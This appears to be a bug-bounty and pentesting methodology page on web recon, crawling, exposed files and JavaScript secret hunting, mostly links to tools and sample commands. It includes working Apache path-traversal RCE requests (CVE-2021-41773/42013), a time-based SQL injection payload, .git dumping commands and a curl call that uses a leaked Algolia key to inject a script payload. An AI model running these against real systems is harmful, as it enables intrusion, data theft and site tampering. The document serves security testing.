Web Enumeration

Recon, fuzzing and crawling

Recon

Also check for other exposed ports. Ex: 22, look for regsshion, etc. See Protocols

nmap -p 80,443,8000,8080,8180,8888,1000 --open -oA web_discovery -iL scope_list

GitHub - scmanjarrez/CVEScannerV2: Nmap script that scans for probable vulnerabilities based on services discovered in open ports.GitHub

GitHub - vulnersCom/nmap-vulners: NSE script based on Vulners.com APIGitHub

Leverage Shodan and find CVE

GitHub - iamunixtz/Lazy-Hunter: LazyHunter is an automated reconnaissance tool designed for bug hunters, leveraging Shodan's InternetDB and CVEDB APIsGitHub

EyeWitness or Aquatone - See Information Gathering

Fingerprinting / Crawling

GitHub - blackhatethicalhacking/SecretOpt1c: SecretOpt1c is a Red Team tool that helps uncover sensitive information in websites using ACTIVE and PASSIVE Techniques for Superior Accuracy!GitHub

GitHub - chm0dx/creepyCrawler: OSINT tool to crawl a site and extract useful recon info.GitHub

SSL / TLS

GitHub - testssl/testssl.sh: Testing TLS/SSL encryption anywhere on any portGitHub

GitHub - projectdiscovery/tlsx: Fast and configurable TLS grabber focused on TLS based data collection.GitHub

HTTP/2 - DoS

Basic vulnerability scanning to see if web servers may be vulnerable to CVE-2023-44487

GitHub - bcdannyboy/CVE-2023-44487: Basic vulnerability scanning to see if web servers may be vulnerable to CVE-2023-44487GitHub

HTTP Downgrading

HTTP downgrading is the process of forcing a request to be processed under HTTP/1.1 instead of HTTP/2.

1. Open Burp Suite and Navigate to Proxy → HTTP History

2. Locate the request that is currently using HTTP/2.

3. Send the Request to Repeater

4. In the Repeater tab, open the "Inspector" panel → Request Attributes → Protocol

5. Change HTTP Version to HTTP/1.1

6. Click "Send" in Repeater.

If successful, you should receive a valid response, confirming the server accepts HTTP/1.1.

Now, test for request smuggling

HTTP Request Smuggling

HTTP Methods

GitHub - ShutdownRepo/httpmethods: HTTP verb tampering & methods enumerationGitHub

HTTP Verb Tampering

Apache Vulnerability Testing

GitHub - mrmtwoj/apache-vulnerability-testing: Apache HTTP Server Vulnerability Testing Tool | PoC for CVE-2024-38472 , CVE-2024-39573 , CVE-2024-38477 , CVE-2024-38476 , CVE-2024-38475 , CVE-2024-38474 , CVE-2024-38473 , CVE-2023-38709GitHub

GitHub - TAM-K592/CVE-2024-40725-CVE-2024-40898: CVE-2024-40725 and CVE-2024-40898, affecting Apache HTTP Server versions 2.4.0 through 2.4.61. These flaws pose significant risks to web servers worldwide, potentially leading to source code disclosure and server-side request forgery (SSRF) attacks.GitHub

GitHub - soltanali0/CVE-2024-40725: exploit CVE-2024-40725 (Apache httpd) withGitHub

• CVE-2021-41773 (RCE and LFI)

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close

echo;id

• CVE-2021-42013 (RCE and LFI)

POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

echo;id

Bug-Bounty-Methodology/Technologies/Apache HTTP Server.md at main · trilokdhaked/Bug-Bounty-MethodologyGitHub

Scan for credz

GitHub - m14r41/scan4secrets: SAST and DAST Scan Supported with 400 plus rules available for secrets and allow you add your own wordlist as well. lightweight source code scanner and for URL that detects hardcoded secrets like API keys, credentials, and sensitive information across files and folders.GitHub

Header Exploit

GitHub - c0dejump/HExHTTP: Header Exploitation HTTPGitHub

Common files

GitHub - Bo0oM/fuzz.txt: Potentially dangerous filesGitHub

.git
.gitkeep
.git-rewrite
.gitreview
.git/HEAD
.gitconfig
.git/index
.git/logs
.svnignore
.gitattributes
.gitmodules
.svn/entries
.DS_Store
.env
debug.log
backup/
admin.bak
database.sql
composer.lock

robots.txt

-> robofinder: search for and retrieve historical robots.txt files from Archive.org for any given website.

GitHub - Spix0r/robofinder: Robofinder retrieves historical #robots.txt files from #Archive.org, allowing you to collect old directories and paths for any domain which can helps you in your #OSINT and #recon process.GitHub

.git

.svn

.DS_Store

.env

GitHub - lijiejie/ds_store_exp: A .DS_Store file disclosure exploit. It parses .DS_Store file and downloads files recursively.GitHub

# python ds_store_exp.py http://10.13.X.X/.DS_Store   
[200] http://10.13.X.X/.DS_Store
[200] http://10.13.X.X/JS/.DS_Store
[200] http://10.13.X.X/Images/.DS_Store
[200] http://10.13.X.X/dev/.DS_Store
<--SNIP-->

.DS_Store Files and Why You Should Know About Them - BuildThisBuildThis

What happened After I Scanned 2.6 Million Domains for Exposed .DS_Store Files | HackerNoonhackernoon

The risk of .DS_Store - CyberAntCyberAnt

Cloudflare

Real IP adress

Tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.

GitHub - musana/CF-Hero: CF-Hero is a reconnaissance tool that uses multiple data sources to discover the origin IP addresses of Cloudflare-protected web applicationsGitHub

Internal IP leakage

/cdn-cgi/trace on live hosts — it leaks internal IPs

sitemap.xml

Time based SQL injection: sleep payload [1;SELECT IF((8303>8302),SLEEP(9),2356)#] = 9s

target[.]com/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)# 

SQL Injection

Misconfigurations on popular third-party services

GitHub - intigriti/misconfig-mapper: Misconfig Mapper is a fast tool to help you uncover security misconfigurations on popular third-party services used by your company and/or bug bounty targets!GitHub

Escalating your privileges via open signups in popular servicesIntigriti

Git Exposed

DotGit Extension - Firefox and Chrome https://addons.mozilla.org/en-US/firefox/addon/dotgit/

cat domains.txt | nuclei -t gitExposed.yaml

Nuclei Template: https://github.com/coffinxp/priv8-Nuclei/blob/main/git-exposed.yaml

id: git-exposed

info:
  name: Exposed Git Repository
  author: kaks3c
  severity: medium
  description: |
    Checks for exposed Git repositories by making requests to potential Git repository paths.
  tags: p3,logs,git

http:
  - raw:
      - |
        GET {{BaseURL}}{{path}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0
        Accept: */*
        Accept-Language: en-US,en;q=0.5
        Connection: close

    attack: pitchfork
    payloads:
      path:
        - /.git/
        - /.git/HEAD
        - /.git/config
        - /.git/logs/HEAD
        - /.git/logs/
        - /.git/description
        - /.git/refs/heads/
        - /.git/refs/remotes/
        - /.git/objects/

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "commit (initial): Initial commit" #/.git/logs/HEAD
          - "ref: refs/heads/" #/.git/HEAD
          - "logallrefupdates = true" #/.git/config
          - "repositoryformatversion = 0" #/.git/config
          - "Index of /" #/.git/
          - "You do not have permission to access /.git/" #403_/.git
          - "Unnamed repository; edit this file 'description' to name the repository" #/.git/description

      - type: regex
        regex:
          - "info/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/objects/
          - "pack/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/objects/
          - "master/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/refs/heads/
          - "origin/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/refs/remotes/
          - "refs/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}"  #/.git/logs/

    stop-at-first-match: true

.git found => download the target .git folder

wget -r -np -nH --cut-dirs=1 -R "index.html*" http://dev.dumpme.htb/.git/

Or with tools:

The best tool is goop

GitHub - nyancrimew/goop: Yet another tool to dump a git repository from a website, focused on as-complete-as-possible dumps and handling weird edge-cases.GitHub

$ git clone https://github.com/deletescape/goop
$ cd goop
$ go build
$ ./goop http://dev.dumpme.htb  

GitHub - lijiejie/GitHack: A `.git` folder disclosure exploitGitHub

GitHub - WangYihang/GitHacker: 🕷️ A `.git` folder exploiting tool that is able to restore the entire Git repository, including stash, common branches and common tags.GitHub

GitHub - Ebryx/GitDump: A pentesting tool that dumps the source code from .git even when the directory traversal is disabledGitHub

After that, search for creds, vulnerabilities, etc:

Credentials in git reposGitHub - finding vulnerabilities

SVN Expoxed

GitHub - anantshri/svn-extractor: simple script to extract all web resources by means of .SVN folder exposed over network.GitHub

./svn-extractor.py --url http://url.com --match database.php

PHPMyAdmin

target[.]com/phpmyadmin/setup/index.php ==> 301 to login page

target[.]com/phpMyAdmin/setup/index.php ==> 200 to phpmyadmin setup

AdminDirectoryFinder

GitHub - tausifzaman/AdminDirectoryFinder: Admin Directory Finder is a tool designed to scan and identify directories under admin paths, such as admin/dashboard.php. It helps in security testing by detecting hidden or sensitive admin panels within a web application. Ideal for penetration testers and developers to ensure proper access control and security measures.GitHub

WSAAR

GitHub - Nishacid/WSAAR: Auto-Recon script that will help you in the Burp Suite Certified Practitioner Examor with any web-security lab.GitHub

OWASP Noir

GitHub - owasp-noir/noir: Hunt every Endpoint in your code, expose Shadow APIs, map the Attack Surface.GitHub

$ noir -b . -u http://example.com
$ noir -b . -u http://example.com --passive-scan

URLScan.io

Check URLScan as a complement to Wayback Machine

Information Gathering

Postman

Domain name -> Workspace type Public

WaybackLister

Reconnaissance tool that taps into the Wayback Machine to fetch historical URLs for a domain, parses unique paths, and checks if any of those paths currently expose directory listings

GitHub - anmolksachan/wayBackLister: A New Approach to Directory Bruteforce with WaybackLister v1.0GitHub

python waybacklister.py -d target.com

Wayback Machine

GitHub - mhmdiaa/chronos: Wayback Machine OSINT FrameworkGitHub

# RECON METHOD BY ~/.COFFINXP

https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original

curl -G "https://web.archive.org/cdx/search/cdx" --data-urlencode "url=*.example.com/*" --data-urlencode "collapse=urlkey" --data-urlencode "output=text" --data-urlencode "fl=original" > out.txt

cat out.txt | uro |  grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'

Information Gathering

GitHub - AnonKryptiQuz/TimeVault: TimeVault is a specialized automated tool designed to detect potential information disclosure vulnerabilities in web applications by leveraging archived URLs from the Wayback Machine.GitHub

GitHub - xnl-h4ck3r/waymore: Find way more from the Wayback Machine, Common Crawl, Alien Vault OTX, URLScan, VirusTotal & Intelligence X!GitHub

waymore -i target.com -mode U -oU urls.txt

Download pages and extract JS (mode R)

waymore -i target.com -mode R --output-inline-js -ko "\.js$" -oR jsdump/*

GitHub - tomnomnom/waybackurls: Fetch all the URLs that the Wayback Machine knows about for a domainGitHub

JWTxplorer

Scan public archives like the Wayback Machine, extracts leaked JWT tokens, and decodes them to identify potentially exploitable information.

GitHub - chaudharyarjun/JWTXposer: An advanced JWT extraction & decoding tool for bug bounty hunters! 🏴‍☠️GitHub

Backup Files

ffuf -w subdomains.txt:SUB -w payloads/backup_files_only.txt:FILE -u https://SUB/FILE -mc 200 -rate 50  -fs 0 -c -x http://localip:8080

payloads/backup_files_only.txt at main · coffinxp/payloadsGitHub

Fuzzili

GitHub - musana/fuzzuli: fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.GitHub

echo http://target.com | fuzzuli -p

Burp Extension

Backup Finderportswigger.net

Archived Backups

GitHub - anmolksachan/WayBackupFinder: A passive way to find backups/ sensitive information.GitHub

Unlock Hidden Backups with wayBackupFinder.pyMedium

Look for metadata

Extract URLs and paths from web pages

Manually

https://x.com/renniepak/status/1602620834463588352x.com

https://0-a.nl/jsendpoints.txt0-a.nl

javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();

Open Console (ctrl + shift + i) + Allow pasting ("autoriser le collage") + copy paste JS code + click on bookmark

Source: NahamCon2024: .js Files Are Your Friends | @zseano https://www.youtube.com/watch?v=fQoxjBwQZUA

Extensions to run Javascript - No need to use the console

javascript – Get this Extension for 🦊 Firefox (en-US)addons.mozilla.org

Run Javascript - Chrome Web Storechromewebstore.google.com

Code to get URLs and unhide elements - Credits: @coffinxp

javascript:(function(){if(document.getElementById('lostsec-scanner'))return;let e=!1,t=[],n=document.createElement('div');n.id='lostsec-scanner',n.style='position:fixed;bottom:0;left:0;width:100%;height:350px;background:#181818;color:#00bcd4;z-index:999999;padding:20px;font-family:monospace;box-shadow:0 -2px 10px rgba(0,0,0,0.7);border-top:2px solid #00bcd4;overflow:hidden;';let o=document.createElement('div');o.style='position:absolute;top:0;left:0;width:100%;height:10px;background:#222;cursor:ns-resize;',n.appendChild(o);let i=!1,a=0,l=0;o.addEventListener('mousedown',r=>{i=!0,a=r.clientY,l=n.offsetHeight,r.preventDefault()});function d(r){if(i){let d=l-(r.clientY-a);d=Math.max(200,Math.min(d,window.innerHeight*.9)),n.style.height=d+'px';let s=document.getElementById('results-wrapper');s&&(s.style.maxHeight=d-140+'px')}}function c(){i=!1}document.addEventListener('mousemove',d),document.addEventListener('mouseup',c);let s=document.createElement('div');s.textContent='❌',s.style='position:absolute;top:10px;right:20px;font-size:18px;color:#ff4081;cursor:pointer;';function u(){e=!0,document.removeEventListener('mousemove',d),document.removeEventListener('mouseup',c),document.removeEventListener('keydown',f),n.remove(),t.forEach(e=>e.abort())}s.onclick=u,n.appendChild(s);let m=document.createElement('h3');m.textContent='🔍 Lostsec Uncover',m.style='margin:10px 0;color:#00bcd4;',n.appendChild(m);let v=document.createElement('input');v.placeholder='Search URLs...',v.style='width:100%;padding:6px;margin-bottom:10px;border-radius:4px;border:none;font-size:14px;outline:none;background:#222;color:#00bcd4;',n.appendChild(v);let y=document.createElement('div');y.style='margin-bottom:10px;display:flex;gap:10px;flex-wrap:wrap;';let h=document.createElement('button');h.textContent='📋 Copy All',h.style='padding:5px 10px;background:#222;color:#00bcd4;border:none;border-radius:3px;cursor:pointer;';let g=document.createElement('button');g.textContent='⬇️ Export .txt',g.style='padding:5px 10px;background:#222;color:#00bcd4;border:none;border-radius:3px;cursor:pointer;';let z=document.createElement('button');z.textContent='🪄 Unhide Elements',z.style='padding:5px 10px;background:#222;color:#00bcd4;border:none;border-radius:3px;cursor:pointer;';z.onclick=()=>{document.querySelectorAll('[disabled],[readonly]').forEach(el=>{el.removeAttribute('disabled');el.removeAttribute('readonly');});document.querySelectorAll('[style*="display: none"],.hidden').forEach(el=>{el.style.display='block';});document.querySelectorAll('[style*="pointer-events: none"],.grayed').forEach(el=>{el.style.pointerEvents='auto';el.style.opacity='1';});alert('✅ Disabled, readonly, and hidden elements are now active!');};let p=document.createElement('label');p.style='display:flex;align-items:center;gap:5px;color:#00bcd4;font-size:14px;cursor:pointer;';let b=document.createElement('input');b.type='checkbox',p.appendChild(b),p.appendChild(document.createTextNode('Domain only')),y.appendChild(h),y.appendChild(g),y.appendChild(z),y.appendChild(p),n.appendChild(y);let w=document.createElement('div');w.id='results',w.style='margin-top:10px;color:#00bcd4;';let k=document.createElement('div');k.id='results-wrapper',k.style='background:#222;padding:10px;border-radius:5px;max-height:180px;overflow:auto;margin-top:10px;',n.appendChild(w),n.appendChild(k),document.body.appendChild(n);let x=new URL(window.location.href).hostname;function f(r){'Escape'===r.key&&u()}document.addEventListener('keydown',f);let totalScripts=0,processedScripts=0,foundSet=new Set,domUrls=[];function updateProgress(){w.innerHTML=`<div style="margin:10px 0;color:#00bcd4">Scanning... (${processedScripts}/${totalScripts} scripts processed)</div>`}function updateResults(){let arr=[...new Set([...domUrls,...foundSet])];C=arr,T(arr)}async function scanExternalScripts(){let scripts=document.getElementsByTagName('script');totalScripts=Array.from(scripts).filter(s=>s.src).length,processedScripts=0;let regex=/["'`]\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=["'`])/g,promises=[];for(let s of scripts)if(s.src){let ctrl=new AbortController;t.push(ctrl),promises.push(fetch(s.src,{signal:ctrl.signal}).then(r=>r.text()).then(text=>{if(e)return;let matches=text.matchAll(regex);for(let m of matches)foundSet.add(m[0]);processedScripts++,updateProgress(),updateResults()}).catch(err=>{processedScripts++,updateProgress();'AbortError'!==err.name&&console.error(err)}))}await Promise.all(promises)}function L(){let e=new Set;document.querySelectorAll('a,script,img,link,form').forEach(t=>{t.href&&e.add(t.href),t.src&&e.add(t.src),t.action&&e.add(t.action)});let n=document.documentElement.innerHTML,o=/(?:url\(|href=|src=|action=|url:|endpoint:|path:|route:)\s*["']?([^"')\s>]+)(?=["'>\s])/gi,i;for(;null!==(i=o.exec(n));)i[1]&&!i[1].startsWith('data:')&&e.add(i[1]);(n.match(/"[^"]*"|'[^']*'/g)||[]).forEach(t=>{let n=/(?:\/[a-zA-Z0-9_-]+)+(?:\.[a-zA-Z0-9]+)?/g,o=t.match(n)||[];o.forEach(t=>e.add(t))}),performance.getEntriesByType('resource').forEach(t=>e.add(t.name));return Array.from(e).sort()}function T(n){k.innerHTML='';let o=n.filter(t=>{if(b.checked&&!t.includes(x))return!1;let n=v.value.toLowerCase();return!(n&&!t.toLowerCase().includes(n))});o.forEach(e=>{let t=document.createElement('div');t.style='color:#fff;margin:4px 0;padding:5px;background:#333;border-radius:3px;word-break:break-all;',t.textContent=e,k.appendChild(t)})}function U(e){return e.filter(t=>{if(b.checked&&!t.includes(x))return!1;let n=v.value.toLowerCase();return!(n&&!t.toLowerCase().includes(n))})}let C=[];v.addEventListener('input',()=>T(C)),b.addEventListener('change',()=>T(C)),h.addEventListener('click',()=>{let e=U(C);navigator.clipboard.writeText(e.join('\n')).then(()=>alert('✅ URLs copied!'))}),g.addEventListener('click',()=>{let e=U(C),t=new Blob([e.join('\n')]),n=document.createElement('a');n.href=URL.createObjectURL(t),n.download='lostsec_urls.txt',n.click()}),function init(){w.textContent='Scanning...';domUrls=L(),updateResults(),scanExternalScripts().then(()=>{if(e)return;w.innerHTML=`<div style="margin:10px 0;color:#00bcd4">✅ Scan complete! Found ${C.length} unique URLs & Endpoints on ${x}</div>`,T(C)}).catch(n=>{if(e)return;console.error(n),w.textContent='❌ Error during scan. Check console for details.'})}();})();

Crawling

Carridi

GitHub - edoardottt/cariddi: Take a list of domains, crawl urls and scan for endpoints, secrets, api keys, file extensions, tokens and moreGitHub

$ echo https://target.com/ | cariddi
$ cat target.txt | carridi

Gourlex

gourlex -t domain.com

GitHub - trap-bytes/gourlex: Gourlex is a simple tool that can be used to extract URLs and paths from web pages.GitHub

xnLinkFinder

GitHub - xnl-h4ck3r/xnLinkFinder: A python tool used to discover endpoints, potential parameters, a target specific wordlist for a given target and secretsGitHub

xnLinkfinder -i bugcrowd.com -sp https://www.bugcrowd.com -sf "bugcrowd.*" -d2 -v

Command breakdown:

-i http://bugcrowd.com  → Target domain 
-sp https://bugcrowd.com  → Scope prefix 
-sf "bugcrowd.*" → Scope filter 
-d 2 → Crawl depth 
https://github.com/mhmdiaa/chronos
-v → Verbose output

Hakrawler

GitHub - hakluke/hakrawler: Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web applicationGitHub

echo https://google.com | hakrawler

Waybackurls

GitHub - tomnomnom/waybackurls: Fetch all the URLs that the Wayback Machine knows about for a domainGitHub

Katana & Urlfinder

katana -u https://tesla.com

GitHub - projectdiscovery/katana: A next-generation crawling and spidering framework.GitHub

urlfinder -d tesla.com

GitHub - projectdiscovery/urlfinder: A high-speed tool for passively gathering URLs, optimized for efficient and comprehensive web asset discovery without active scanning.GitHub

GetAllURL - gau

GitHub - lc/gau: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.GitHub

gau https://target.com

LinkFinder

GitHub - GerbenJavado/LinkFinder: A python script that finds endpoints in JavaScript filesGitHub

python3 linkfinder.py -i https://example.com/app.js

$ python linkfinder.py -i 'js/*' -o result.html
$ python linkfinder.py -i 'js/*' -o cli

GoLinkFinder

Faster than LinkFinder

GitHub - 0xsha/GoLinkFinder: A fast and minimal JS endpoint extractorGitHub

golinkfinder -file js_files.txt -output results.json

LazyEgg

GitHub - schooldropout1337/lazyeggGitHub

ReconSpider

See Fingerprinting / Crawling

BadSecrets - Cookies

GitHub - blacklanternsecurity/badsecrets: A library for detecting known secrets across many web frameworksGitHub

Name	Description
ASPNET_Viewstate	Checks the viewstate/generator against a list of known machine keys.
Telerik_HashKey	Checks patched (2017+) versions of Telerik UI for a known Telerik.Upload.ConfigurationHashKey
Telerik_EncryptionKey	Checks patched (2017+) versions of Telerik UI for a known Telerik.Web.UI.DialogParametersEncryptionKey
Flask_SignedCookies	Checks for weak Flask cookie signing password. Wrapper for flask-unsign
Peoplesoft_PSToken	Can check a peoplesoft PS_TOKEN for a bad/weak signing password
Django_SignedCookies	Checks django's session cookies (when in signed_cookie mode) for known django secret_key
Rails_SecretKeyBase	Checks Ruby on Rails signed or encrypted session cookies (from multiple major releases) for known secret_key_base
Generic_JWT	Checks JWTs for known HMAC secrets or RSA private keys
Jsf_viewstate	Checks Both Mojarra and Myfaces implimentations of Java Server Faces (JSF) for use of known or weak secret keys
Symfony_SignedURL	Checks symfony "_fragment" urls for known HMAC key. Operates on Full URL, including hash
Express_SignedCookies_ES	Checks express.js express-session middleware for signed cookies and session cookies for known 'session secret'
Express_SignedCookies_CS	Checks express.js cookie-session middleware for signed cookies and session cookies for known secret
Laravel_SignedCookies	Checks 'laravel_session' cookies for known laravel 'APP_KEY'
ASPNET_Vstate	Checks for a once popular custom compressed Viewstate code snippet vulnerable to RCE
Rack2_SignedCookies	Checks Rack 2.x signed cookies for known secret keys
Yii2_SignedCookies	Checks Yii2 framework signed cookies for known cookie validation keys

Secrets in Response

Detects sensitive information leaks in HTTP responses using custom regex-based signatures

GitHub - Ahmex000/Y-Leak-Scanner.go: A highly efficient and powerful Go script designed to detect sensitive data leaks in JavaScript files.GitHub

Metadata

Metadata and Hidden infos

JS Files

Sensitive JS Files

ffuf -w subdomains.txt:SUB -w payloads/senstivejs.txt:FILE -u https://SUB/FILE -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" -fs 0 -c -mc 200 -fr false -rate 10 -t 10

payloads/senstivejs.txt at main · 0xSs0rZ/payloadsGitHub

/js/config.js
/js/credentials.js
/js/secrets.js
/js/keys.js
/js/password.js
/js/api_keys.js
/js/auth_tokens.js
/js/access_tokens.js
/js/sessions.js
/js/authorization.js 
/js/encryption.js
/js/certificates.js
/js/ssl_keys.js
/js/passphrases.js 
/js/policies.js
/js/permissions.js 
/js/privileges.js
/js/hashes.js
/js/salts.js
/js/nonces.js
/js/signatures.js
/js/digests.js
/js/tokens.js
/js/cookies.js
/js/topsecr3tdonotlook.js

Burp

Source: NahamCon2024: .js Files Are Your Friends | @zseano https://www.youtube.com/watch?v=fQoxjBwQZUA

JavaScript Analysis for Pentesterskpwn.de

wget -i urls.txt

Detect secrets

./trufflehog filesystem ~/Downloads/js --no-verification --include-detectors="all"

Burp Extension

TruffleHog Integrationportswigger.net

Code Analysis

Code Analysis

semgrep scan --config auto

JSFScan.sh

1 - Gather Jsfile Links from different sources.
2 - Import File Containing JSUrls
3 - Extract Endpoints from Jsfiles
4 - Find Secrets from Jsfiles
5 - Get Jsfiles store locally for manual analysis
6 - Make a Wordlist from Jsfiles
7 - Extract Variable names from jsfiles for possible XSS.
8 - Scan JsFiles For DomXSS.
9 - Generate Html Report.

GitHub - KathanP19/JSFScan.sh: Automation for javascript recon in bug bounty.GitHub

bash JFScan.sh -l target.txt --all -r -o outputdir

Morgan

Identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites

GitHub - VFA250/Morgan: Morgan is a powerful tool designed to help security researchers, developers, and security auditors identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites.GitHub

Gouge - Burp extension to extract URLs which are seen in JS files

GitHub - mqst/gouge: Gouge is a simple Burp extension to extract or gouge all URLs which are seen in JS files as you visit different websites/webpages in Burp SuiteGitHub

GetJS

GitHub - 003random/getJS: A tool to fastly get all javascript sources/filesGitHub

JSHunter

Endpoint Extraction and Sensitive Data Detection

cat urls.txt | grep "\.js" | jshunter

GitHub - cc1a2b/JShunter: jshunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for and bug bounty hunters and security researchers.GitHub

Javascript Deobfuscator

GitHub - ben-sb/javascript-deobfuscator: General purpose JavaScript deobfuscatorGitHub

Online

JavaScript Deobfuscatordeobfuscate.io

API Endpoint - Burp History

dump/json2paths at master · s0md3v/dumpGitHub

API Endpoint in JS File

cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u

JSNinja

GitHub - iamunixtz/JsHunter: High-Performance JavaScript Security Scanner - Process 1M URLs in ~5 hours with Telegram & Discord bot integration, Docker support, and comprehensive workflow automationGitHub

JS Link Finder

JS Link Finderportswigger.net

Jsluice

GitHub - BishopFox/jsluice: Extract URLs, paths, secrets, and other interesting bits from JavaScriptGitHub

GitHub - 0x999-x/jsluicepp: jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic using the CLI tool jsluiceGitHub

API

Sensitive data in JS Files

Top 25 JavaScript path files used to store sensitive information

/js/config.js
/js/credentials.js
/js/secrets.js
/js/keys.js
/js/password.js
/js/api_keys.js
/js/auth_tokens.js
/js/access_tokens.js
/js/sessions.js
/js/authorization.js 
/js/encryption.js
/js/certificates.js
/js/ssl_keys.js
/js/passphrases.js 
/js/policies.js
/js/permissions.js 
/js/privileges.js
/js/hashes.js
/js/salts.js
/js/nonces.js
/js/signatures.js
/js/digests.js
/js/tokens.js
/js/cookies.js
/js/topsecr3tdonotlook.js

GitHub - BishopFox/jsluice: Extract URLs, paths, secrets, and other interesting bits from JavaScriptGitHub

GitHub - iamunixtz/JsHunter: High-Performance JavaScript Security Scanner - Process 1M URLs in ~5 hours with Telegram & Discord bot integration, Docker support, and comprehensive workflow automationGitHub

Sensitive Data (API Key, JWT token, etc.) Exposed

JS Miner - Burp Extension

X-Keys - Burp Extension

GitHub - vsec7/BurpSuite-Xkeys: A Burp Suite Extension to extract interesting strings (key, secret, token, or etc.) from a webpage.GitHub

jsluice++ - Burp Extension

GitHub - 0x999-x/jsluicepp: jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic using the CLI tool jsluiceGitHub

SecretFinder

GitHub - m4ll0k/SecretFinder: SecretFinder - A python script for find sensitive data (apikeys, accesstoken,jwt,..) and search anything on javascript filesGitHub

JS-Snitch

GitHub - vavkamil/js-snitch: Scans remote JavaScript files with Trufflehog + Semgrep to detect leaked secretsGitHub

Mantra

GitHub - brosck/mantra: 「🔑」A tool used to hunt down API key leaks in JS files and pagesGitHub

Testing API Key

GitHub - streaak/keyhacks: Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.GitHub

Google Maps API Key

GitHub - ozguralp/gmapsapiscannerGitHub

Algolia API Key

Tool

GitHub - Suryesh/Algopwn: Algopwn is an interactive Python tool for security researchers and bug-bounty hunters to audit Algolia API keys. It detects ACLs, distinguishes read-only vs sensitive permissions, enumerates indexes, and — with explicit confirmation — performs a controlled PoC and prints a verification URL. Built for responsible use only.GitHub

Manual Testing

https://www.secjuice.com/api-misconfiguration-data-breach/www.secjuice.com

GitHub - streaak/keyhacks: Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.GitHub

Algolia API Key Exploitation leads to $1000 Bounty (P2) on Private programMedium

Check ACL:

https://APPID-dsn.algolia.net/1/keys/APIKEY?x-algolia-application-id=APPID&x-algolia-api-key=APIKEY

The most damaging permissions are

• addObject: Allows adding/updating an object in the index. (Copying/moving indices are also allowed with this permission.)

• deleteObject: Allows deleting an existing object.

• deleteIndex: Allows deleting an index (will break search completely)

• editSettings: Allows changing index settings. - this also allows you to run javascript when the search is used.

• listIndexes: Allows listing all accessible indices.

• logs: this will allow you to view the search logs, which can include IP Addresses and sensitive cookies.

Abuse editSettings to put an XSS paylaod:

curl --request PUT \
  --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
  --header 'content-type: application/json' \
  --header 'x-algolia-api-key: <example-key>' \
  --header 'x-algolia-application-id: <example-application-id>' \
  --data '{"highlightPreTag": "<script>alert(1);</script>"}'

List indexes

curl -X GET \
  "https://{appID}-dsn.algolia.net/1/indexes/" \
  -H "X-Algolia-API-Key: {api-key}" \
  -H "X-Algolia-Application-Id: {appID}"

